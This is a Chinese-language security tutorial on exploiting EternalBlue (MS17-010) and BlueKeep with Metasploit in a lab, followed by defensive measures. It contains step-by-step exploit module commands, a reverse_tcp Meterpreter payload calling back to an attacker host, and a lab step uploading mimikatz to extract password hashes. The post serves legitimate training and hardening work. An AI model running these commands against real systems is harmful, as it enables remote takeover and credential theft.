网络安全入门攻击与防御实战(四)

embedded/2025/2/23 4:13:19/

漏洞利用:永恒之蓝(MS17-010)与同类漏洞解析

1 永恒之蓝(MS17-010)漏洞背景

(1)漏洞信息

  • CVE编号:CVE-2017-0143 ~ CVE-2017-0148

  • 影响范围:Windows XP ~ Windows 2012(未安装2017年3月补丁的系统)。

  • 漏洞类型:SMB协议缓冲区溢出(远程代码执行)。

  • 危害:攻击者可完全控制目标主机(被WannaCry勒索病毒广泛利用)。

(2)漏洞原理

  • SMBv1协议在处理畸形请求时未正确校验内存,导致攻击者通过恶意数据包覆盖关键内存区域,执行任意代码。


2 Metasploit攻击实战

(1) 环境准备

  • 攻击机:Kali Linux(预装Metasploit)。

  • 靶机:未打补丁的Windows 7 SP1(需关闭防火墙,开启SMBv1服务)。

  • 网络配置:确保攻击机与靶机处于同一局域网(NAT/桥接模式)。

(2)攻击步骤

  1. 启动Metasploit并搜索模块

    msfconsole  
    search ms17_010  # 显示相关模块(如exploit/windows/smb/ms17_010_eternalblue)
  2. 配置模块参数

    use exploit/windows/smb/ms17_010_eternalblue  
    set RHOST 192.168.1.100  # 靶机IP  
    set PAYLOAD windows/x64/meterpreter/reverse_tcp  # 反向Shell负载  
    set LHOST 192.168.1.50   # 攻击机IP  
    exploit  
  3. 攻击成功验证

    • 若成功,进入meterpreter会话:

      meterpreter > getuid  # 显示当前权限(应为NT AUTHORITY\SYSTEM)  
      meterpreter > shell   # 进入系统命令行  
       

3 同类高危漏洞解析

(1)CVE-2019-0708(BlueKeep)

  • 影响:Windows远程桌面服务(RDP)漏洞,无需用户交互即可触发。

  • Metasploit利用

    use exploit/windows/rdp/cve_2019_0708_bluekeep  
    set RHOST 192.168.1.101  
    run  

(2)CVE-2021-34527(PrintNightmare)

  • 影响:Windows打印服务权限提升漏洞。

  • 利用场景:本地低权限用户获取SYSTEM权限。

(3)CVE-2022-30190(Follina)

  • 影响:Office远程代码执行(通过恶意Word文档触发)。

  • 攻击链:诱导用户打开文档 → 调用MSDT执行Payload。


常见问题与解决方案
问题原因分析解决方案
模块加载失败“No module found”Metasploit版本过旧更新Metasploit:sudo apt update && sudo apt install metasploit-framework
攻击失败“Target not vulnerable”靶机已安装补丁检查靶机补丁(wmic qfe list查看是否包含KB4012212)。
Meterpreter会话不稳定网络波动或靶机防护软件拦截使用bind_tcp负载(正向连接)替代reverse_tcp
权限不足“NT AUTHORITY\NETWORK”漏洞利用链不完整尝试其他模块(如ms17_010_psexec)。

防御措施
  1. 打补丁

    • 永恒之蓝:安装微软2017年3月安全更新(KB4012212)。

    • BlueKeep:安装KB4500331补丁。

  2. 关闭高危服务

    # 禁用SMBv1(Windows命令)  
    PowerShell Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force  
  3. 网络分段:限制SMB/RDP端口的互联网暴露(仅允许内网访问)。

  4. 入侵检测:部署IDS/IPS监控异常SMB流量(如大量\pipe\srvsvc请求)。


动手实验:漏洞复现与加固
  1. 复现永恒之蓝攻击

    • 使用Metasploit获取靶机Shell,执行upload /root/tools/mimikatz.exe提取密码哈希。

  2. 加固Windows靶机

    • 安装补丁后重新扫描,验证漏洞是否修复(Nmap脚本:nmap -p445 --script smb-vuln-ms17-010 192.168.1.100)。


总结
  • 永恒之蓝网络蠕虫级漏洞的代表,需彻底关闭SMBv1并更新系统。

  • 同类漏洞(如BlueKeep)证明老旧协议的高风险性,需持续关注微软安全公告。

  • 防御核心:最小化服务暴露 + 实时漏洞管理 + 流量监控。

注意:漏洞利用仅限授权测试,非法攻击将承担法律责任!


通过本节学习,你已掌握如何利用Metasploit复现高危漏洞,下一步可探索其他漏洞(如Weblogic反序列化)的利用与防御


http://www.ppmy.cn/embedded/164085.html

相关文章

探索飞鹤奶粉奥秘,领会科技魅力

在科技迅猛发展的当下,AI 技术正深刻重塑各行业格局。乳制品行业亦不例外。近日,长江商学院「AI 未来空间站」的同学们深入走访了飞鹤集团,探寻其在数字化浪潮中的创新实践与卓越成就。 在飞鹤的智能化生产车间,同学们目睹了高度自…

深入解析SORT多目标跟踪算法:从原理到实现

深入解析SORT多目标跟踪算法:从原理到实现 一、多目标跟踪概述 1.1 问题定义 多目标跟踪(Multiple Object Tracking, MOT)是计算机视觉领域的核心任务之一,旨在从视频序列中持续检测多个目标并维护其身份标识。其核心挑战在于处…

开源Odoo设备智慧运维系统在纺织机械行业的实施方案 ——基于Odoo设备模块、SKF Phoenix API与IMAX-8数采网关的深度集成

一、项目背景与目标 纺织机械行业作为典型的资产密集型产业,设备运维效率直接影响生产成本与产品质量。当前行业痛点包括: 设备故障响应滞后:传统人工巡检效率低,故障发现依赖经验,停机损失高;数据孤岛严…

孤独症项目(3)

今天一刷朋友圈,一个小学同学订婚了。老实讲确实是羡慕了,到我这个年龄,游戏的吸引力已经下降了很多了,我需要性和爱。可是我身高,帅气,money什么都没有,所以我怎么办呢。我把那个同学屏蔽了&am…

RIME-CNN-SVM故障诊断

构建一个高效、准确的基于卷积神经网络(CNN)的电力系统故障识别与分类仿真系统,实现对电力系统故障的精准识别与分类。在这一模型中,CNN被用来执行故障数据的特征提取与抽象化处理,随后,这些经过抽象的特征…

Rust 未来会成为主流的编程语言吗?

Rust是由Mozilla团队主导开发的编程语言,首次亮相是在2010年。自发布以来,Rust凭借其内存安全性、出色的性能和对并发操作的支持,逐渐吸引了众多开发者的关注。据Stack Overflow的2021年调查数据显示,Rust连续多年被开发者评为最喜…

使用Kafka进行实时数据流处理的场景

当然,以下是一个使用Apache Kafka进行实时数据流处理的典型场景描述: 场景背景 假设我们运营一个大型的电子商务平台,该平台每天需要处理数百万笔交易和数亿条用户行为日志。为了实时分析这些数据以提供个性化的推荐、监控交易欺诈行为以及…

从零搭建微服务项目Base(第5章——SpringBoot项目LogBack日志配置+Feign使用)

前言: 本章主要在原有项目上添加了日志配置,对SpringBoot默认的logback的配置进行了自定义修改,并详细阐述了xml文件配置要点(只对日志配置感兴趣的小伙伴可选择直接跳到第三节),并使用Feign代替原有RestT…